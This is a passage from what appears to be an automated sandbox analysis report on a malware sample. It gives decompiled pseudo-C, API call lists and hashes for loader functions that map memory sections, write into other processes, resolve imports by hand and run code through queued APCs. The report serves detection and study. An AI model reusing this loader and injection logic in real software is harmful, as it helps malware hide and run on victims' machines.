                                                                                                                                        • Opcode Fuzzy Hash: 672d55a76be78c931a36429570adf0dda9075a73d5d6f688c06625c2393fd433
                                                                                                                                        • Instruction Fuzzy Hash: A2216F71D00209AFCB01DFA9C8809EEFBF9FF08314F10456AE615F3210D774AA488B65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751CEF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                        			E73751CEF(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E73751880(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                        0x73751cf8
                                                                                                                                        0x73751cff
                                                                                                                                        0x73751d00
                                                                                                                                        0x73751d01
                                                                                                                                        0x73751d02
                                                                                                                                        0x73751d03
                                                                                                                                        0x73751d14
                                                                                                                                        0x73751d18
                                                                                                                                        0x73751d2c
                                                                                                                                        0x73751d2f
                                                                                                                                        0x73751d32
                                                                                                                                        0x73751d39
                                                                                                                                        0x73751d3c
                                                                                                                                        0x73751d43
                                                                                                                                        0x73751d46
                                                                                                                                        0x73751d49
                                                                                                                                        0x73751d4c
                                                                                                                                        0x73751d51
                                                                                                                                        0x73751d8c
                                                                                                                                        0x73751d53
                                                                                                                                        0x73751d56
                                                                                                                                        0x73751d5c
                                                                                                                                        0x73751d61
                                                                                                                                        0x73751d65
                                                                                                                                        0x73751d83
                                                                                                                                        0x73751d67
                                                                                                                                        0x73751d6e
                                                                                                                                        0x73751d7c
                                                                                                                                        0x73751d7c
                                                                                                                                        0x73751d65
                                                                                                                                        0x73751d94

                                                                                                                                        APIs
                                                                                                                                        • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 73751D4C
                                                                                                                                          • Part of subcall function 73751880: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,73751D61,00000002,00000000,?,?,00000000,?,?,73751D61,?), ref: 737518AD
                                                                                                                                        • memset.NTDLL ref: 73751D6E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateViewmemset
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2533685722-2766056989
                                                                                                                                        • Opcode ID: 5f1105f09404ad2eb7a73370a959e72865a0610fd00d8de07a1f287c8e034285
                                                                                                                                        • Instruction ID: 07ec83a801b03c772f5abafffde8c073881c6beb616071098c900aa1851acfa8
                                                                                                                                        • Opcode Fuzzy Hash: 5f1105f09404ad2eb7a73370a959e72865a0610fd00d8de07a1f287c8e034285
                                                                                                                                        • Instruction Fuzzy Hash: EE2108B2D0020DAFDB11DFA9C984ADEFBB9EF48355F104529E605F3610D735AA448BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00462557, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(6F57775A,00000318), ref: 0046257C
                                                                                                                                        • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00462598
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 0044C536: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 0044C55F
                                                                                                                                          • Part of subcall function 0044C536: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,004625D9,00000000,00000000,00000028,00000100), ref: 0044C581
                                                                                                                                        • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00462702
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3547194813-0
                                                                                                                                        • Opcode ID: 85f169a6a578f664670f57c9946d477c00f360e83e47712cd13f4647a648f5c7
                                                                                                                                        • Instruction ID: 55234ba3fdd1df2b01efd5f9dbfb2b457cdf4ac322d02dcdaefffe76ca208f80
                                                                                                                                        • Opcode Fuzzy Hash: 85f169a6a578f664670f57c9946d477c00f360e83e47712cd13f4647a648f5c7
                                                                                                                                        • Instruction Fuzzy Hash: DA616D70A0060AAFDB14DFA5C980BAEB7B4FF08305F04416AE904E7351EB74E955CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00446825, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00446839
                                                                                                                                        • GetProcAddress.KERNEL32(6F57775A), ref: 00446861
                                                                                                                                        • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 0044687F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressInformationProcProcess64QueryWow64memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2968673968-0
                                                                                                                                        • Opcode ID: c6ed1619e1cb165a5476ab0c0a7809d9499f0ffa9b2facc1a8cb74150cca79f1
                                                                                                                                        • Instruction ID: 80b86039b49fa7ca95fdc9fa05d762195bafdf316b3416088b620b7a40c8f55b
                                                                                                                                        • Opcode Fuzzy Hash: c6ed1619e1cb165a5476ab0c0a7809d9499f0ffa9b2facc1a8cb74150cca79f1
                                                                                                                                        • Instruction Fuzzy Hash: A6117375A01118AFFB10DB95DC49F9E77B9BB45704F05002AF908E7290E7B4ED05CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00453A77, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,004575FD,00000000,?,004575FD,?,00000000,00000000,00000318,00000020,00000000,00010003,?), ref: 00453A95
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00453AA4
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,004575FD,?,00000000,00000000,00000318,00000020,00000000,00010003,?,?,00000318,00000008), ref: 00453AAB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$LastMemoryStatusVirtualWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1089604434-0
                                                                                                                                        • Opcode ID: d2b2101ea97f5bb263036503ee92431d1c8b67d7bc047f9df71242f237589055
                                                                                                                                        • Instruction ID: 5d5196aa574aed6921f266dba8db8f53fd219c981c690e4e5fd9764a657efda5
                                                                                                                                        • Opcode Fuzzy Hash: d2b2101ea97f5bb263036503ee92431d1c8b67d7bc047f9df71242f237589055
                                                                                                                                        • Instruction Fuzzy Hash: 58E0483360021AABCF115FE9DD14D9B7B59FB08786B004025FE41D2121D775CD219BE5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 737519DA, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E737519DA(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                                                                                                                                        0x737519de
                                                                                                                                        0x737519ef
                                                                                                                                        0x737519f7
                                                                                                                                        0x737519f9
                                                                                                                                        0x73751a0c
                                                                                                                                        0x73751a0c
                                                                                                                                        0x73751a16

                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,73752027,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 737519EF
                                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,73752027,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 737519F9
                                                                                                                                        • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,73752027,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 73751A0C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3724080410-0
                                                                                                                                        • Opcode ID: 5c4f06e5478c6bcad7b5ea7c3ce80ac124279bc5e41b9806b1418247b5020eab
                                                                                                                                        • Instruction ID: e76f3bf4dec4451c30b49b3357e90fc4289cb0401075ea95593837f98a739e9c
                                                                                                                                        • Opcode Fuzzy Hash: 5c4f06e5478c6bcad7b5ea7c3ce80ac124279bc5e41b9806b1418247b5020eab
                                                                                                                                        • Instruction Fuzzy Hash: 50E04F6568030DB6FB04E7919E0ABBD73BCAB0070AF500044BB45EA0C0D6B89A04AA65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 737515AB, Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E737515AB(void* __eax, void* __edx) {
				char _v8;
				void** _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				void** _t36;
				intOrPtr _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E73751779( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t34 = _v8;
					_t28 = E737518D7( &_v8, _t34, _t35);
					if(_t28 == 0) {
						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
						_t23 = E73751BCD(_t34, _t38); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E73751EDE(_t38, _t31, _t34); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t34);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					_t36[6](NtClose( *_t36));
					E737514B6(_t36);
					L8:
					return _t28;
				}
			}














                                                                                                                                        0x737515ab
                                                                                                                                        0x737515b3
                                                                                                                                        0x737515d0
                                                                                                                                        0x737515d7
                                                                                                                                        0x73751636
                                                                                                                                        0x00000000
                                                                                                                                        0x737515d9
                                                                                                                                        0x737515d9
                                                                                                                                        0x737515e3
                                                                                                                                        0x737515e7
                                                                                                                                        0x737515ec
                                                                                                                                        0x737515f0
                                                                                                                                        0x737515f5
                                                                                                                                        0x737515f9
                                                                                                                                        0x737515fe
                                                                                                                                        0x73751603
                                                                                                                                        0x73751607
                                                                                                                                        0x7375160c
                                                                                                                                        0x7375160d
                                                                                                                                        0x73751611
                                                                                                                                        0x73751616
                                                                                                                                        0x7375161e
                                                                                                                                        0x7375161e
                                                                                                                                        0x73751616
                                                                                                                                        0x73751607
                                                                                                                                        0x737515f9
                                                                                                                                        0x73751620
                                                                                                                                        0x73751629
                                                                                                                                        0x7375162d
                                                                                                                                        0x73751637
                                                                                                                                        0x7375163d
                                                                                                                                        0x7375163d

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 73751779: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,737515D5,?,?,?,00000002,?,?,?), ref: 7375179E
                                                                                                                                          • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 737517C0
                                                                                                                                          • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 737517D6
                                                                                                                                          • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 737517EC
                                                                                                                                          • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 73751802
                                                                                                                                          • Part of subcall function 73751779: GetProcAddress.KERNEL32(00000000,?), ref: 73751818
                                                                                                                                          • Part of subcall function 737518D7: memcpy.NTDLL(?,00000002,737515E3,?,0000000A,?,?,?,737515E3,?,0000000A,?,?,?,00000002), ref: 73751904
                                                                                                                                          • Part of subcall function 737518D7: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 73751937
                                                                                                                                        • NtClose.NTDLL(?,?,0000000A,?,?,?,00000002,?,?,?,?), ref: 73751625
                                                                                                                                          • Part of subcall function 73751BCD: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 73751C03
                                                                                                                                          • Part of subcall function 73751BCD: lstrlenA.KERNEL32(00000002), ref: 73751C19
                                                                                                                                          • Part of subcall function 73751BCD: memset.NTDLL ref: 73751C23
                                                                                                                                          • Part of subcall function 73751BCD: GetProcAddress.KERNEL32(?,00000002), ref: 73751C86
                                                                                                                                          • Part of subcall function 73751BCD: lstrlenA.KERNEL32(-00000002), ref: 73751C9B
                                                                                                                                          • Part of subcall function 73751BCD: memset.NTDLL ref: 73751CA5
                                                                                                                                          • Part of subcall function 73751EDE: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 73751F0C
                                                                                                                                          • Part of subcall function 73751EDE: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 73751F63
                                                                                                                                          • Part of subcall function 73751EDE: GetLastError.KERNEL32(?,?), ref: 73751F69
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 73751618
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$CloseHandleLibraryLoadModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2954739140-0
                                                                                                                                        • Opcode ID: 3a48f309f889a32652bcc43f59fb08139e78e7765502d2b764618596080922a1
                                                                                                                                        • Instruction ID: e4699f95f2d3ca5d3f33829446652b39e4de70c7ab0eea7c0ac4d8863ffc8c7a
                                                                                                                                        • Opcode Fuzzy Hash: 3a48f309f889a32652bcc43f59fb08139e78e7765502d2b764618596080922a1
                                                                                                                                        • Instruction Fuzzy Hash: 29110C736017156BEB25ABE98D88F9B77BCEF44255F080168F902D3240EFA5EC0587A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044C536, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(6F57775A,00000000), ref: 0044C55F
                                                                                                                                        • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,004625D9,00000000,00000000,00000028,00000100), ref: 0044C581
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressMemory64ProcReadVirtualWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 752694512-0
                                                                                                                                        • Opcode ID: 236c73407b54c4d6a08c62347a760a1906ac6f96b72a1385801cc300d2b59398
                                                                                                                                        • Instruction ID: 9d427eeaf3f71052856635d3a2b09bee3d004151b221b6f6870e8f5d611b0320
                                                                                                                                        • Opcode Fuzzy Hash: 236c73407b54c4d6a08c62347a760a1906ac6f96b72a1385801cc300d2b59398
                                                                                                                                        • Instruction Fuzzy Hash: AFF03776101105BB9B018F96DC84C9EBBFAEB84740B04406AF505C2230E6B1E951DF28
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751880, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E73751880(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                        0x73751892
                                                                                                                                        0x73751898
                                                                                                                                        0x737518a6
                                                                                                                                        0x737518ad
                                                                                                                                        0x737518b2
                                                                                                                                        0x737518b8
                                                                                                                                        0x00000000
                                                                                                                                        0x737518b9
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,73751D61,00000002,00000000,?,?,00000000,?,?,73751D61,?), ref: 737518AD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323581903-0
                                                                                                                                        • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                        • Instruction ID: 2d3a7ac6fd2c0f479eb59037ed09885498a31a3fe2b0f309640567edb28a9570
                                                                                                                                        • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                        • Instruction Fuzzy Hash: DBF037B590020CFFEB119FA5CD85D9FBBBDEB44365B104E39F552E2190D630AE089B60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0046345F, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtMapViewOfSection.NTDLL(00000000,000000FF,00456283,00000000,00000000,00456283,00000000,00000002,00000000,?,?,00000000,00456283,000000FF,00000000), ref: 0046348D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323581903-0
                                                                                                                                        • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                                                                                                        • Instruction ID: d0effbb520f69120ab9023fe09b6315617a27c4394e14a4669dfcda6dbeb9666
                                                                                                                                        • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                                                                                                        • Instruction Fuzzy Hash: 90F012B690020CFFDB119FA5CC89C9FBBBDEB44349B10882AF542D1050D6319E189B61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045865A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0046E240), ref: 00458671
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1778838933-0
                                                                                                                                        • Opcode ID: 23144df6e49275368eca9fb7fc252a998d61e70e16fdb132f237e7e063f70224
                                                                                                                                        • Instruction ID: b4970ce301b587462f0bf4e48fc2204ad447b3b6c66bf761e597e857a7751921
                                                                                                                                        • Opcode Fuzzy Hash: 23144df6e49275368eca9fb7fc252a998d61e70e16fdb132f237e7e063f70224
                                                                                                                                        • Instruction Fuzzy Hash: 74F0BE313001299FCB20DF19CC44D9BBBA8EB04741B014429EE00EB2A2EB30EC09CBE4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044AB47, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AB70
                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(0046E220), ref: 0044ABA3
                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(0046E240), ref: 0044ABAA
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00445505), ref: 0044ABD9
                                                                                                                                        • ReleaseMutex.KERNEL32(00000324,00000000,?,?,?,00445505), ref: 0044ABEA
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,00445505), ref: 0044ABF6
                                                                                                                                        • ResetEvent.KERNEL32(00000000,00000000,?,?,?,00445505), ref: 0044AC02
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00445505), ref: 0044AC0E
                                                                                                                                        • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AC14
                                                                                                                                        • SleepEx.KERNEL32(00000064,00000001,?,?,00445505), ref: 0044AC28
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00445505), ref: 0044AC4B
                                                                                                                                        • RtlRemoveVectoredExceptionHandler.NTDLL(00644280), ref: 0044AC84
                                                                                                                                        • SleepEx.KERNEL32(00000064,00000001,?,?,00445505), ref: 0044ACA0
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(03BD8418,?,?,00445505), ref: 0044ACC7
                                                                                                                                        • LocalFree.KERNEL32(?,?,00445505), ref: 0044ACD7
                                                                                                                                          • Part of subcall function 0046386B: GetVersion.KERNEL32(?,00000000,74B5F720,?,0044AB61,00000000,?,?,?,00445505), ref: 0046388F
                                                                                                                                          • Part of subcall function 0046386B: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,0044AB61,00000000,?,?,?,00445505), ref: 004638A3
                                                                                                                                          • Part of subcall function 0046386B: GetProcAddress.KERNEL32(00000000), ref: 004638AA
                                                                                                                                          • Part of subcall function 00462D5E: RtlEnterCriticalSection.NTDLL(0046E240), ref: 00462D68
                                                                                                                                          • Part of subcall function 00462D5E: RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00462DA4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCriticalSectionSleep$Handle$ChangeDeleteFindFreeNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2858272568-0
                                                                                                                                        • Opcode ID: ddfa5bcb58e78052fc11ac66baef7f0111c6b288f1f2650a49da3561a88d3b53
                                                                                                                                        • Instruction ID: 2a0f4cbb0f4d85028b30795c55c9485400d68c0abdddfa84e4036920fe599c92
                                                                                                                                        • Opcode Fuzzy Hash: ddfa5bcb58e78052fc11ac66baef7f0111c6b288f1f2650a49da3561a88d3b53
                                                                                                                                        • Instruction Fuzzy Hash: D441B635680221DFEB20AF66EDC5A5637E6EB01300714043AF600D7271EBF99C558B6F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751D97, Relevance: 22.6, APIs: 15, Instructions: 116threadsleepsynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E73751D97(void* __ecx, void* __edx, char _a4) {
				long _v8;
				void* _v32;
				void* __edi;
				long _t17;
				long _t19;
				long _t21;
				long _t22;
				void* _t23;
				long _t26;
				long _t27;
				void* _t36;
				intOrPtr _t38;
				long _t43;
				intOrPtr _t44;
				void* _t45;
				void* _t50;
				signed int _t53;
				void* _t55;
				intOrPtr* _t56;

				_t45 = __ecx;
				_t17 = E73751371();
				_v8 = _t17;
				if(_t17 != 0) {
					return _t17;
				}
				do {
					_t53 = SwitchToThread() + 8;
					_t19 = E7375123E(0, _t53); // executed
					_v8 = _t19;
					Sleep(0x20 + _t53 * 4); // executed
					_t21 = _v8;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					L23:
					return _t21;
				}
				_t22 = E73751FDB(_t45); // executed
				_v8 = _t22;
				if(_t22 != 0) {
					L21:
					_t21 = _v8;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L23;
				}
				if(_a4 != 0) {
					L12:
					_t23 = CreateThread(0, 0, __imp__SleepEx,  *0x7375414c, 0, 0); // executed
					_t55 = _t23;
					if(_t55 == 0) {
						L19:
						_v8 = GetLastError();
						L20:
						goto L21;
					}
					_t26 = QueueUserAPC(E73752058, _t55,  &_v32); // executed
					if(_t26 == 0) {
						_t43 = GetLastError();
						TerminateThread(_t55, _t43);
						CloseHandle(_t55);
						_t55 = 0;
						SetLastError(_t43);
					}
					if(_t55 == 0) {
						goto L19;
					} else {
						_t27 = WaitForSingleObject(_t55, 0xffffffff);
						_v8 = _t27;
						if(_t27 == 0) {
							GetExitCodeThread(_t55,  &_v8); // executed
						}
						CloseHandle(_t55);
						goto L20;
					}
				}
				if(E73751958(_t45,  &_a4) != 0) {
					 *0x73754138 = 0;
					goto L12;
				}
				_t44 = _a4;
				_t56 = __imp__GetLongPathNameW;
				_t36 =  *_t56(_t44, 0, 0); // executed
				_t50 = _t36;
				if(_t50 == 0) {
					L10:
					 *0x73754138 = _t44;
					goto L12;
				}
				_t11 = _t50 + 2; // 0x2
				_t38 = E737518C2(_t50 + _t11);
				 *0x73754138 = _t38;
				if(_t38 == 0) {
					goto L10;
				}
				 *_t56(_t44, _t38, _t50); // executed
				E737514B6(_t44);
				goto L12;
			}






















                                                                                                                                        0x73751d97
                                                                                                                                        0x73751d9e
                                                                                                                                        0x73751da7
                                                                                                                                        0x73751daa
                                                                                                                                        0x73751edb
                                                                                                                                        0x73751edb
                                                                                                                                        0x73751db1
                                                                                                                                        0x73751db9
                                                                                                                                        0x73751dbd
                                                                                                                                        0x73751dc2
                                                                                                                                        0x73751dcd
                                                                                                                                        0x73751dd3
                                                                                                                                        0x73751dd6
                                                                                                                                        0x73751ddd
